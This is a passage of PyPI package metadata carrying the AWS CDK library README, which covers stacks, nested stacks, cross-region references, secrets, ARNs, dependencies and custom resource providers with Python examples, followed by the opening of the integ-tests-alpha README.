tags](https://docs.aws.amazon.com/IAM/latest/UserGuide/tutorial_attribute-based-access-control.html). You can pass session tags for each [role created during bootstrap](https://docs.aws.amazon.com/cdk/v2/guide/bootstrapping-env.html#bootstrapping-env-roles) via the `*additionalOptions` property: ```python class MyStack(Stack): def __init__(self, parent, id, *, description=None, env=None, stackName=None, tags=None, notificationArns=None, synthesizer=None, terminationProtection=None, analyticsReporting=None, crossRegionReferences=None, permissionsBoundary=None, suppressTemplateIndentation=None, propertyInjectors=None): super().__init__(parent, id, (SpreadAssignment ...props description=description, env=env, stackName=stackName, tags=tags, notificationArns=notificationArns, synthesizer=synthesizer, terminationProtection=terminationProtection, analyticsReporting=analyticsReporting, crossRegionReferences=crossRegionReferences, permissionsBoundary=permissionsBoundary, suppressTemplateIndentation=suppressTemplateIndentation, propertyInjectors=propertyInjectors), synthesizer=DefaultStackSynthesizer( deploy_role_additional_options={ "Tags": [{"Key": "Department", "Value": "Engineering"}] }, file_asset_publishing_role_additional_options={ "Tags": [{"Key": "Department", "Value": "Engineering"}] }, image_asset_publishing_role_additional_options={ "Tags": [{"Key": "Department", "Value": "Engineering"}] }, lookup_role_additional_options={ "Tags": [{"Key": "Department", "Value": "Engineering"}] } ) ) ``` This will cause the CDK CLI to include session tags when assuming each of these roles during deployment. Note that the trust policy of the role must contain permissions for the `sts:TagSession` action. Refer to the [IAM user guide on session tags](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_session-tags.html#id_session-tags_permissions-required). * If you are using a custom bootstrap template, make sure the template includes these permissions. * If you are using the default bootstrap template from a CDK version lower than XXXX, you will need to rebootstrap your enviroment (once). ## Nested Stacks [Nested stacks](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/using-cfn-nested-stacks.html) are stacks created as part of other stacks. You create a nested stack within another stack by using the `NestedStack` construct. As your infrastructure grows, common patterns can emerge in which you declare the same components in multiple templates. You can separate out these common components and create dedicated templates for them. Then use the resource in your template to reference other templates, creating nested stacks. For example, assume that you have a load balancer configuration that you use for most of your stacks. Instead of copying and pasting the same configurations into your templates, you can create a dedicated template for the load balancer. Then, you just use the resource to reference that template from within other templates. The following example will define a single top-level stack that contains two nested stacks: each one with a single Amazon S3 bucket: ```python class MyNestedStack(cfn.NestedStack): def __init__(self, scope, id, *, parameters=None, timeout=None, notifications=None): super().__init__(scope, id, parameters=parameters, timeout=timeout, notifications=notifications) s3.Bucket(self, "NestedBucket") class MyParentStack(Stack): def __init__(self, scope, id, *, description=None, env=None, stackName=None, tags=None, notificationArns=None, synthesizer=None, terminationProtection=None, analyticsReporting=None, crossRegionReferences=None, permissionsBoundary=None, suppressTemplateIndentation=None, propertyInjectors=None): super().__init__(scope, id, description=description, env=env, stackName=stackName, tags=tags, notificationArns=notificationArns, synthesizer=synthesizer, terminationProtection=terminationProtection, analyticsReporting=analyticsReporting, crossRegionReferences=crossRegionReferences, permissionsBoundary=permissionsBoundary, suppressTemplateIndentation=suppressTemplateIndentation, propertyInjectors=propertyInjectors) MyNestedStack(self, "Nested1") MyNestedStack(self, "Nested2") ``` Resources references across nested/parent boundaries (even with multiple levels of nesting) will be wired by the AWS CDK through CloudFormation parameters and outputs. When a resource from a parent stack is referenced by a nested stack, a CloudFormation parameter will automatically be added to the nested stack and assigned from the parent; when a resource from a nested stack is referenced by a parent stack, a CloudFormation output will be automatically be added to the nested stack and referenced using `Fn::GetAtt "Outputs.Xxx"` from the parent. Nested stacks also support the use of Docker image and file assets. ## Accessing resources in a different stack You can access resources in a different stack, as long as they are in the same account and AWS Region (see [next section](#accessing-resources-in-a-different-stack-and-region) for an exception). The following example defines the stack `stack1`, which defines an Amazon S3 bucket. Then it defines a second stack, `stack2`, which takes the bucket from stack1 as a constructor property. ```python prod = {"account": "123456789012", "region": "us-east-1"} stack1 = StackThatProvidesABucket(app, "Stack1", env=prod) # stack2 will take a property { bucket: IBucket } stack2 = StackThatExpectsABucket(app, "Stack2", bucket=stack1.bucket, env=prod ) ``` If the AWS CDK determines that the resource is in the same account and Region, but in a different stack, it automatically synthesizes AWS CloudFormation [Exports](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/using-cfn-stack-exports.html) in the producing stack and an [Fn::ImportValue](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/intrinsic-function-reference-importvalue.html) in the consuming stack to transfer that information from one stack to the other. ## Accessing resources in a different stack and region > **This feature is currently experimental** You can enable the Stack property `crossRegionReferences` in order to access resources in a different stack *and* region. With this feature flag enabled it is possible to do something like creating a CloudFront distribution in `us-east-2` and an ACM certificate in `us-east-1`. ```python from aws_cdk import Environment, Environment stack1 = Stack(app, "Stack1", env=Environment( region="us-east-1" ), cross_region_references=True ) cert = acm.Certificate(stack1, "Cert", domain_name="*.example.com", validation=acm.CertificateValidation.from_dns(route53.PublicHostedZone.from_hosted_zone_id(stack1, "Zone", "Z0329774B51CGXTDQV3X")) ) stack2 = Stack(app, "Stack2", env=Environment( region="us-east-2" ), cross_region_references=True ) cloudfront.Distribution(stack2, "Distribution", default_behavior=cloudfront.BehaviorOptions( origin=origins.HttpOrigin("example.com") ), domain_names=["dev.example.com"], certificate=cert ) ``` When the AWS CDK determines that the resource is in a different stack *and* is in a different region, it will "export" the value by creating a custom resource in the producing stack which creates SSM Parameters in the consuming region for each exported value. The parameters will be created with the name '/cdk/exports/${consumingStackName}/${export-name}'. In order to "import" the exports into the consuming stack a [SSM Dynamic reference](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/dynamic-references.html#dynamic-references-ssm) is used to reference the SSM parameter which was created. In order to mimic strong references, a Custom Resource is also created in the consuming stack which marks the SSM parameters as being "imported". When a parameter has been successfully imported, the producing stack cannot update the value. > [!NOTE] > As a consequence of this feature being built on a Custom Resource, we are restricted to a > CloudFormation response body size limitation of [4096 bytes](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/crpg-ref-responses.html). > To prevent deployment errors related to the Custom Resource Provider response body being too > large, we recommend limiting the use of nested stacks and minimizing the length of stack names. > Doing this will prevent SSM parameter names from becoming too long which will reduce the size of the > response body. See the [adr](https://github.com/aws/aws-cdk/blob/main/packages/aws-cdk-lib/core/adr/cross-region-stack-references.md) for more details on this feature. ### Removing automatic cross-stack references The automatic references created by CDK when you use resources across stacks are convenient, but may block your deployments if you want to remove the resources that are referenced in this way. You will see an error like: ```text Export Stack1:ExportsOutputFnGetAtt-****** cannot be deleted as it is in use by Stack1 ``` Let's say there is a Bucket in the `stack1`, and the `stack2` references its `bucket.bucketName`. You now want to remove the bucket and run into the error above. It's not safe to remove `stack1.bucket` while `stack2` is still using it, so unblocking yourself from this is a two-step process. This is how it works: DEPLOYMENT 1: break the relationship * Make sure `stack2` no longer references `bucket.bucketName` (maybe the consumer stack now uses its own bucket, or it writes to an AWS DynamoDB table, or maybe you just remove the Lambda Function altogether). * In the `stack1` class, call `this.exportValue(this.bucket.bucketName)`. This will make sure the CloudFormation Export continues to exist while the relationship between the two stacks is being broken. * Deploy (this will effectively only change the `stack2`, but it's safe to deploy both). DEPLOYMENT 2: remove the resource * You are now free to remove the `bucket` resource from `stack1`. * Don't forget to remove the `exportValue()` call as well. * Deploy again (this time only the `stack1` will be changed -- the bucket will be deleted). ## Durations To make specifications of time intervals unambiguous, a single class called `Duration` is used throughout the AWS Construct Library by all constructs that that take a time interval as a parameter (be it for a timeout, a rate, or something else). An instance of Duration is constructed by using one of the static factory methods on it: ```python Duration.seconds(300) # 5 minutes Duration.minutes(5) # 5 minutes Duration.hours(1) # 1 hour Duration.days(7) # 7 days Duration.parse("PT5M") ``` Durations can be added or subtracted together: ```python Duration.minutes(1).plus(Duration.seconds(60)) # 2 minutes Duration.minutes(5).minus(Duration.seconds(10)) ``` ## Size (Digital Information Quantity) To make specification of digital storage quantities unambiguous, a class called `Size` is available. An instance of `Size` is initialized through one of its static factory methods: ```python Size.kibibytes(200) # 200 KiB Size.mebibytes(5) # 5 MiB Size.gibibytes(40) # 40 GiB Size.tebibytes(200) # 200 TiB Size.pebibytes(3) ``` Instances of `Size` created with one of the units can be converted into others. By default, conversion to a higher unit will fail if the conversion does not produce a whole number. This can be overridden by unsetting `integral` property. ```python Size.mebibytes(2).to_kibibytes() # yields 2048 Size.kibibytes(2050).to_mebibytes(rounding=SizeRoundingBehavior.FLOOR) ``` ## Secrets To help avoid accidental storage of secrets as plain text, we use the `SecretValue` type to represent secrets. Any construct that takes a value that should be a secret (such as a password or an access key) will take a parameter of type `SecretValue`. The best practice is to store secrets in AWS Secrets Manager and reference them using `SecretValue.secretsManager`: ```python secret = SecretValue.secrets_manager("secretId", json_field="password", # optional: key of a JSON field to retrieve (defaults to all content), version_id="id", # optional: id of the version (default AWSCURRENT) version_stage="stage" ) ``` Using AWS Secrets Manager is the recommended way to reference secrets in a CDK app. `SecretValue` also supports the following secret sources: * `SecretValue.unsafePlainText(secret)`: stores the secret as plain text in your app and the resulting template (not recommended). * `SecretValue.secretsManager(secret)`: refers to a secret stored in Secrets Manager * `SecretValue.ssmSecure(param, version)`: refers to a secret stored as a SecureString in the SSM Parameter Store. If you don't specify the exact version, AWS CloudFormation uses the latest version of the parameter. * `SecretValue.cfnParameter(param)`: refers to a secret passed through a CloudFormation parameter (must have `NoEcho: true`). * `SecretValue.cfnDynamicReference(dynref)`: refers to a secret described by a CloudFormation dynamic reference (used by `ssmSecure` and `secretsManager`). * `SecretValue.resourceAttribute(attr)`: refers to a secret returned from a CloudFormation resource creation. `SecretValue`s should only be passed to constructs that accept properties of type `SecretValue`. These constructs are written to ensure your secrets will not be exposed where they shouldn't be. If you try to use a `SecretValue` in a different location, an error about unsafe secret usage will be thrown at synthesis time. If you rotate the secret's value in Secrets Manager, you must also change at least one property on the resource where you are using the secret, to force CloudFormation to re-read the secret. `SecretValue.ssmSecure()` is only supported for a limited set of resources. [Click here for a list of supported resources and properties](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/dynamic-references.html#template-parameters-dynamic-patterns-resources). `SecretValue.cfnDynamicReferenceKey` takes the same parameters as `SecretValue.secretsManager` and returns a key which can be used within a [dynamic reference](#dynamic-references) to dynamically load a secret from AWS Secrets Manager. ## ARN manipulation Sometimes you will need to put together or pick apart Amazon Resource Names (ARNs). The functions `stack.formatArn()` and `stack.splitArn()` exist for this purpose. `formatArn()` can be used to build an ARN from components. It will automatically use the region and account of the stack you're calling it on: ```python # stack: Stack # Builds "arn:<PARTITION>:lambda:<REGION>:<ACCOUNT>:function:MyFunction" stack.format_arn( service="lambda", resource="function", arn_format=ArnFormat.COLON_RESOURCE_NAME, resource_name="MyFunction" ) ``` `splitArn()` can be used to get a single component from an ARN. `splitArn()` will correctly deal with both literal ARNs and deploy-time values (tokens), but in case of a deploy-time value be aware that the result will be another deploy-time value which cannot be inspected in the CDK application. ```python # stack: Stack # Extracts the function name out of an AWS Lambda Function ARN arn_components = stack.split_arn(arn, ArnFormat.COLON_RESOURCE_NAME) function_name = arn_components.resource_name ``` Note that the format of the resource separator depends on the service and may be any of the values supported by `ArnFormat`. When dealing with these functions, it is important to know the format of the ARN you are dealing with. For an exhaustive list of ARN formats used in AWS, see [AWS ARNs and Namespaces](https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html) in the AWS General Reference. Some L1 constructs also have an auto-generated static `arnFor<ResourceName>()` method that can be used to generate ARNs for resources of that type. For example, `sns.Topic.arnForTopic(topic)` can be used to generate an ARN for a given topic. Note that the parameter to this method is of type `ITopicRef`, which means that it can be used with both `Topic` (L2) and `CfnTopic` (L1) constructs. ## Dependencies ### Construct Dependencies Sometimes AWS resources depend on other resources, and the creation of one resource must be completed before the next one can be started. In general, CloudFormation will correctly infer the dependency relationship between resources based on the property values that are used. In the cases where it doesn't, the AWS Construct Library will add the dependency relationship for you. If you need to add an ordering dependency that is not automatically inferred, you do so by adding a dependency relationship using `constructA.node.addDependency(constructB)`. This will add a dependency relationship between all resources in the scope of `constructA` and all resources in the scope of `constructB`. If you want a single object to represent a set of constructs that are not necessarily in the same scope, you can use a `DependencyGroup`. The following creates a single object that represents a dependency on two constructs, `constructB` and `constructC`: ```python # Declare the dependable object b_and_c = DependencyGroup() b_and_c.add(construct_b) b_and_c.add(construct_c) # Take the dependency construct_a.node.add_dependency(b_and_c) ``` ### Stack Dependencies Two different stack instances can have a dependency on one another. This happens when an resource from one stack is referenced in another stack. In that case, CDK records the cross-stack referencing of resources, automatically produces the right CloudFormation primitives, and adds a dependency between the two stacks. You can also manually add a dependency between two stacks by using the `stackA.addDependency(stackB)` method. A stack dependency has the following implications: * Cyclic dependencies are not allowed, so if `stackA` is using resources from `stackB`, the reverse is not possible anymore. * Stacks with dependencies between them are treated specially by the CDK toolkit: * If `stackA` depends on `stackB`, running `cdk deploy stackA` will also automatically deploy `stackB`. * `stackB`'s deployment will be performed *before* `stackA`'s deployment. ### CfnResource Dependencies To make declaring dependencies between `CfnResource` objects easier, you can declare dependencies from one `CfnResource` object on another by using the `cfnResource1.addDependency(cfnResource2)` method. This method will work for resources both within the same stack and across stacks as it detects the relative location of the two resources and adds the dependency either to the resource or between the relevant stacks, as appropriate. If more complex logic is in needed, you can similarly remove, replace, or view dependencies between `CfnResource` objects with the `CfnResource` `removeDependency`, `replaceDependency`, and `obtainDependencies` methods, respectively. ## Custom Resources Custom Resources are CloudFormation resources that are implemented by arbitrary user code. They can do arbitrary lookups or modifications during a CloudFormation deployment. Custom resources are backed by *custom resource providers*. Commonly, these are Lambda Functions that are deployed in the same deployment as the one that defines the custom resource itself, but they can also be backed by Lambda Functions deployed previously, or code responding to SNS Topic events running on EC2 instances in a completely different account. For more information on custom resource providers, see the next section. Once you have a provider, each definition of a `CustomResource` construct represents one invocation. A single provider can be used for the implementation of arbitrarily many custom resource definitions. A single definition looks like this: ```python CustomResource(self, "MyMagicalResource", resource_type="Custom::MyCustomResource", # must start with 'Custom::' # the resource properties # properties like serviceToken or serviceTimeout are ported into properties automatically # try not to use key names similar to these or there will be a risk of overwriting those values properties={ "Property1": "foo", "Property2": "bar" }, # the ARN of the provider (SNS/Lambda) which handles # CREATE, UPDATE or DELETE events for this resource type # see next section for details service_token="ARN", # the maximum time, in seconds, that can elapse before a custom resource operation times out. service_timeout=Duration.seconds(60) ) ``` ### Custom Resource Providers Custom resources are backed by a **custom resource provider** which can be implemented in one of the following ways. The following table compares the various provider types (ordered from low-level to high-level): | Provider | Compute Type | Error Handling | Submit to CloudFormation | Max Timeout | Language | Footprint | | -------------------------------------------------------------------- | :----------: | :------------: | :----------------------: | :-------------: | :------: | :-------: | | [sns.Topic](#amazon-sns-topic) | Self-managed | Manual | Manual | Unlimited | Any | Depends | | [lambda.Function](#aws-lambda-function) | AWS Lambda | Manual | Manual | 15min | Any | Small | | [core.CustomResourceProvider](#the-corecustomresourceprovider-class) | AWS Lambda | Auto | Auto | 15min | Node.js | Small | | [custom-resources.Provider](#the-custom-resource-provider-framework) | AWS Lambda | Auto | Auto | Unlimited Async | Any | Large | Legend: * **Compute type**: which type of compute can be used to execute the handler. * **Error Handling**: whether errors thrown by handler code are automatically trapped and a FAILED response is submitted to CloudFormation. If this is "Manual", developers must take care of trapping errors. Otherwise, events could cause stacks to hang. * **Submit to CloudFormation**: whether the framework takes care of submitting SUCCESS/FAILED responses to CloudFormation through the event's response URL. * **Max Timeout**: maximum allows/possible timeout. * **Language**: which programming languages can be used to implement handlers. * **Footprint**: how many resources are used by the provider framework itself. #### A note about singletons When defining resources for a custom resource provider, you will likely want to define them as a *stack singleton* so that only a single instance of the provider is created in your stack and which is used by all custom resources of that type. Here is a basic pattern for defining stack singletons in the CDK. The following examples ensures that only a single SNS topic is defined: ```python def get_or_create(self, scope): stack = Stack.of(scope) uniqueid = "GloballyUniqueIdForSingleton" # For example, a UUID from `uuidgen` existing = stack.node.try_find_child(uniqueid) if existing: return existing return sns.Topic(stack, uniqueid) ``` #### Amazon SNS Topic Every time a resource event occurs (CREATE/UPDATE/DELETE), an SNS notification is sent to the SNS topic. Users must process these notifications (e.g. through a fleet of worker hosts) and submit success/failure responses to the CloudFormation service. > You only need to use this type of provider if your custom resource cannot run on AWS Lambda, for reasons other than the 15 > minute timeout. If you are considering using this type of provider because you want to write a custom resource provider that may need > to wait for more than 15 minutes for the API calls to stabilize, have a look at the [`custom-resources`](#the-custom-resource-provider-framework) module first. > > Refer to the [CloudFormation Custom Resource documentation](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/template-custom-resources.html) for information on the contract your custom resource needs to adhere to. Set `serviceToken` to `topic.topicArn` in order to use this provider: ```python topic = sns.Topic(self, "MyProvider") CustomResource(self, "MyResource", service_token=topic.topic_arn ) ``` #### AWS Lambda Function An AWS lambda function is called *directly* by CloudFormation for all resource events. The handler must take care of explicitly submitting a success/failure response to the CloudFormation service and handle various error cases. > **We do not recommend you use this provider type.** The CDK has wrappers around Lambda Functions that make them easier to work with. > > If you do want to use this provider, refer to the [CloudFormation Custom Resource documentation](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/template-custom-resources.html) for information on the contract your custom resource needs to adhere to. Set `serviceToken` to `lambda.functionArn` to use this provider: ```python fn = lambda_.SingletonFunction(self, "MyProvider", function_props) CustomResource(self, "MyResource", service_token=fn.function_arn ) ``` #### The `core.CustomResourceProvider` class The class [`@aws-cdk/core.CustomResourceProvider`](https://docs.aws.amazon.com/cdk/api/latest/docs/@aws-cdk_core.CustomResourceProvider.html) offers a basic low-level framework designed to implement simple and slim custom resource providers. It currently only supports Node.js-based user handlers, represents permissions as raw JSON blobs instead of `iam.PolicyStatement` objects, and it does not have support for asynchronous waiting (handler cannot exceed the 15min lambda timeout). The `CustomResourceProviderRuntime` supports runtime `nodejs12.x`, `nodejs14.x`, `nodejs16.x`, `nodejs18.x`. > **As an application builder, we do not recommend you use this provider type.** This provider exists purely for custom resources that are part of the AWS Construct Library. > > The [`custom-resources`](#the-custom-resource-provider-framework) provider is more convenient to work with and more fully-featured. The provider has a built-in singleton method which uses the resource type as a stack-unique identifier and returns the service token: ```python service_token = CustomResourceProvider.get_or_create(self, "Custom::MyCustomResourceType", code_directory=f"{__dirname}/my-handler", runtime=CustomResourceProviderRuntime.NODEJS_18_X, description="Lambda function created by the custom resource provider" ) CustomResource(self, "MyResource", resource_type="Custom::MyCustomResourceType", service_token=service_token ) ``` The directory (`my-handler` in the above example) must include an `index.js` file. It cannot import external dependencies or files outside this directory. It must export an async function named `handler`. This function accepts the CloudFormation resource event object and returns an object with the following structure: ```js exports.handler = async function(event) { const id = event.PhysicalResourceId; // only for "Update" and "Delete" const props = event.ResourceProperties; const oldProps = event.OldResourceProperties; // only for "Update"s switch (event.RequestType) { case "Create": // ... case "Update": // ... // if an error is thrown, a FAILED response will be submitted to CFN throw new Error('Failed!'); case "Delete": // ... } return { // (optional) the value resolved from `resource.ref` // defaults to "event.PhysicalResourceId" or "event.RequestId" PhysicalResourceId: "REF", // (optional) calling `resource.getAtt("Att1")` on the custom resource in the CDK app // will return the value "BAR". Data: { Att1: "BAR", Att2: "BAZ" }, // (optional) user-visible message Reason: "User-visible message", // (optional) hides values from the console NoEcho: true }; } ``` Here is an complete example of a custom resource that summarizes two numbers: `sum-handler/index.js`: ```js exports.handler = async (e) => { return { Data: { Result: e.ResourceProperties.lhs + e.ResourceProperties.rhs, }, }; }; ``` `sum.ts`: ```python from constructs import Construct from aws_cdk import CustomResource, CustomResourceProvider, CustomResourceProviderRuntime, Token class Sum(Construct): def __init__(self, scope, id, *, lhs, rhs): super().__init__(scope, id) resource_type = "Custom::Sum" service_token = CustomResourceProvider.get_or_create(self, resource_type, code_directory=f"{__dirname}/sum-handler", runtime=CustomResourceProviderRuntime.NODEJS_18_X ) resource = CustomResource(self, "Resource", resource_type=resource_type, service_token=service_token, properties={ "lhs": lhs, "rhs": rhs } ) self.result = Token.as_number(resource.get_att("Result")) ``` Usage will look like this: ```python sum = Sum(self, "MySum", lhs=40, rhs=2) CfnOutput(self, "Result", value=Token.as_string(sum.result)) ``` To access the ARN of the provider's AWS Lambda function role, use the `getOrCreateProvider()` built-in singleton method: ```python provider = CustomResourceProvider.get_or_create_provider(self, "Custom::MyCustomResourceType", code_directory=f"{__dirname}/my-handler", runtime=CustomResourceProviderRuntime.NODEJS_18_X ) role_arn = provider.role_arn ``` This role ARN can then be used in resource-based IAM policies. To add IAM policy statements to this role, use `addToRolePolicy()`: ```python provider = CustomResourceProvider.get_or_create_provider(self, "Custom::MyCustomResourceType", code_directory=f"{__dirname}/my-handler", runtime=CustomResourceProviderRuntime.NODEJS_18_X ) provider.add_to_role_policy({ "Effect": "Allow", "Action": "s3:GetObject", "Resource": "*" }) ``` Note that `addToRolePolicy()` uses direct IAM JSON policy blobs, *not* a `iam.PolicyStatement` object like you will see in the rest of the CDK. #### The Custom Resource Provider Framework The [`@aws-cdk/custom-resources`](https://docs.aws.amazon.com/cdk/api/latest/docs/custom-resources-readme.html) module includes an advanced framework for implementing custom resource providers. Handlers are implemented as AWS Lambda functions, which means that they can be implemented in any Lambda-supported runtime. Furthermore, this provider has an asynchronous mode, which means that users can provide an `isComplete` lambda function which is called periodically until the operation is complete. This allows implementing providers that can take up to two hours to stabilize. Set `serviceToken` to `provider.serviceToken` to use this type of provider: ```python provider = customresources.Provider(self, "MyProvider", on_event_handler=on_event_handler, is_complete_handler=is_complete_handler ) CustomResource(self, "MyResource", service_token=provider.service_token ) ``` See the [documentation](https://docs.aws.amazon.com/cdk/api/latest/docs/aws-cdk-lib.custom_resources-readme.html) for more details. ## AWS CloudFormation features A CDK stack synthesizes to an AWS CloudFormation Template. This section explains how this module allows users to access low-level CloudFormation features when needed. ### Stack Outputs CloudFormation [stack outputs](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/outputs-section-structure.html) and exports are created using the `CfnOutput` class: ```python CfnOutput(self, "OutputName", value=my_bucket.bucket_name, description="The name of an S3 bucket", # Optional
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk.asset-awscli-v1==2.2.263", "aws-cdk.asset-node-proxy-agent-v6<3.0.0,>=2.1.0", "aws-cdk.cloud-assembly-schema<51.0.0,>=50.3.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:24.267050
aws_cdk_lib-2.239.0.tar.gz
47,594,912
e3/f8/851c18653bf6806877f5c942df7149c1d4f118063106b3c99c083d124da9/aws_cdk_lib-2.239.0.tar.gz
source
sdist
null
false
d4a5b277c727de426462cfa796a9c109
b5637f961e05b0d9ce28da2d759d605e23f4679f2cd0d1262efe3c32986d81f3
e3f8851c18653bf6806877f5c942df7149c1d4f118063106b3c99c083d124da9
null
[]
74,953
2.1
aws-cdk.integ-tests-alpha
2.239.0a0
CDK Integration Testing Constructs
# integ-tests <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> ## Overview This library is meant to be used in combination with the [integ-runner](https://github.com/aws/aws-cdk-cli/tree/main/packages/%40aws-cdk/integ-runner) CLI to enable users to write and execute integration tests for AWS CDK Constructs. An integration test should be defined as a CDK application, and there should be a 1:1 relationship between an integration test and a CDK application. So for example, in order to create an integration test called `my-function` we would need to create a file to contain our integration test application. *test/integ.my-function.ts* ```python app = App() stack = Stack() lambda_.Function(stack, "MyFunction", runtime=lambda_.Runtime.NODEJS_LATEST, handler="index.handler", code=lambda_.Code.from_asset(path.join(__dirname, "lambda-handler")) ) ``` This is a self contained CDK application which we could deploy by running ```bash cdk deploy --app 'node test/integ.my-function.js' ``` In order to turn this into an integration test, all that is needed is to use the `IntegTest` construct. ```python # app: App # stack: Stack IntegTest(app, "Integ", test_cases=[stack]) ``` You will notice that the `stack` is registered to the `IntegTest` as a test case. Each integration test can contain multiple test cases, which are just instances of a stack. See the [Usage](#usage) section for more details. ## Usage ### IntegTest Suppose you have a simple stack, that only encapsulates a Lambda function with a certain handler: ```python class StackUnderTest(Stack): def __init__(self, scope, id, *, architecture=None, description=None, env=None, stackName=None, tags=None, notificationArns=None, synthesizer=None, terminationProtection=None, analyticsReporting=None, crossRegionReferences=None, permissionsBoundary=None, suppressTemplateIndentation=None, propertyInjectors=None): super().__init__(scope, id, architecture=architecture, description=description, env=env, stackName=stackName, tags=tags, notificationArns=notificationArns, synthesizer=synthesizer, terminationProtection=terminationProtection, analyticsReporting=analyticsReporting, crossRegionReferences=crossRegionReferences, permissionsBoundary=permissionsBoundary, suppressTemplateIndentation=suppressTemplateIndentation, propertyInjectors=propertyInjectors) lambda_.Function(self, "Handler", runtime=lambda_.Runtime.NODEJS_LATEST, handler="index.handler", code=lambda_.Code.from_asset(path.join(__dirname, "lambda-handler")), architecture=architecture ) ``` You may want to test this stack under different conditions. For example, we want this stack to be deployed correctly, regardless of the architecture we choose for the Lambda function. In particular, it should work for both `ARM_64` and `X86_64`. So you can create an `IntegTestCase` that exercises both scenarios: ```python class StackUnderTest(Stack): def __init__(self, scope, id, *, architecture=None, description=None, env=None, stackName=None, tags=None, notificationArns=None, synthesizer=None, terminationProtection=None, analyticsReporting=None, crossRegionReferences=None, permissionsBoundary=None, suppressTemplateIndentation=None, propertyInjectors=None): super().__init__(scope, id, architecture=architecture, description=description, env=env, stackName=stackName, tags=tags, notificationArns=notificationArns, synthesizer=synthesizer, terminationProtection=terminationProtection, analyticsReporting=analyticsReporting, crossRegionReferences=crossRegionReferences, permissionsBoundary=permissionsBoundary, suppressTemplateIndentation=suppressTemplateIndentation, propertyInjectors=propertyInjectors) lambda_.Function(self, "Handler", runtime=lambda_.Runtime.NODEJS_LATEST, handler="index.handler", code=lambda_.Code.from_asset(path.join(__dirname, "lambda-handler")), architecture=architecture ) # Beginning of the test suite app = App() IntegTest(app, "DifferentArchitectures", test_cases=[ StackUnderTest(app, "Stack1", architecture=lambda_.Architecture.ARM_64 ), StackUnderTest(app, "Stack2", architecture=lambda_.Architecture.X86_64 ) ] ) ``` This is all the instruction you need for the integration test runner to know which stacks to synthesize, deploy and destroy. But you may also need to customize the behavior of the runner by changing its parameters. For example: ```python from aws_cdk.cloud_assembly_schema import CdkCommands, DeployCommand, DeployOptions, DestroyCommand, DestroyOptions app = App() stack_under_test = Stack(app, "StackUnderTest") stack = Stack(app, "stack") test_case = IntegTest(app, "CustomizedDeploymentWorkflow", test_cases=[stack_under_test], diff_assets=True, stack_update_workflow=True, cdk_command_options=CdkCommands( deploy=DeployCommand( args=DeployOptions( require_approval=RequireApproval.NEVER, json=True ) ), destroy=DestroyCommand( args=DestroyOptions( force=True ) ) ) ) ``` ### IntegTestCaseStack In the majority of cases an integration test will contain a single `IntegTestCase`. By default when you create an `IntegTest` an `IntegTestCase` is created for you and all of your test cases are registered to this `IntegTestCase`. The `IntegTestCase` and `IntegTestCaseStack` constructs are only needed when it is necessary to defined different options for individual test cases. For example, you might want to have one test case where `diffAssets` is enabled. ```python # app: App # stack_under_test: Stack test_case_with_assets = IntegTestCaseStack(app, "TestCaseAssets", diff_assets=True ) IntegTest(app, "Integ", test_cases=[stack_under_test, test_case_with_assets]) ``` ## Assertions This library also provides a utility to make assertions against the infrastructure that the integration test deploys. There are two main scenarios in which assertions are created. * Part of an integration test using `integ-runner` In this case you would create an integration test using the `IntegTest` construct and then make assertions using the `assert` property. You should **not** utilize the assertion constructs directly, but should instead use the `methods` on `IntegTest.assertions`. ```python # app: App # stack: Stack integ = IntegTest(app, "Integ", test_cases=[stack]) integ.assertions.aws_api_call("S3", "getObject") ``` By default an assertions stack is automatically generated for you. You may however provide your own stack to use. ```python # app: App # stack: Stack # assertion_stack: Stack integ = IntegTest(app, "Integ", test_cases=[stack], assertion_stack=assertion_stack) integ.assertions.aws_api_call("S3", "getObject") ``` * Part of a normal CDK deployment In this case you may be using assertions as part of a normal CDK deployment in order to make an assertion on the infrastructure before the deployment is considered successful. In this case you can utilize the assertions constructs directly. ```python # my_app_stack: Stack AwsApiCall(my_app_stack, "GetObject", service="S3", api="getObject" ) ``` ### DeployAssert Assertions are created by using the `DeployAssert` construct. This construct creates it's own `Stack` separate from any stacks that you create as part of your integration tests. This `Stack` is treated differently from other stacks by the `integ-runner` tool. For example, this stack will not be diffed by the `integ-runner`. `DeployAssert` also provides utilities to register your own assertions. ```python # my_custom_resource: CustomResource # stack: Stack # app: App integ = IntegTest(app, "Integ", test_cases=[stack]) integ.assertions.expect("CustomAssertion", ExpectedResult.object_like({"foo": "bar"}), ActualResult.from_custom_resource(my_custom_resource, "data")) ``` In the above example an assertion is created that will trigger a user defined `CustomResource` and assert that the `data` attribute is equal to `{ foo: 'bar' }`. ### API Calls A common method to retrieve the "actual" results to compare with what is expected is to make an API call to receive some data. This library does this by utilizing CloudFormation custom resources which means that CloudFormation will call out to a Lambda Function which will make the API call. #### HttpApiCall Using the `HttpApiCall` will use the [node-fetch](https://github.com/node-fetch/node-fetch) JavaScript library to make the HTTP call. This can 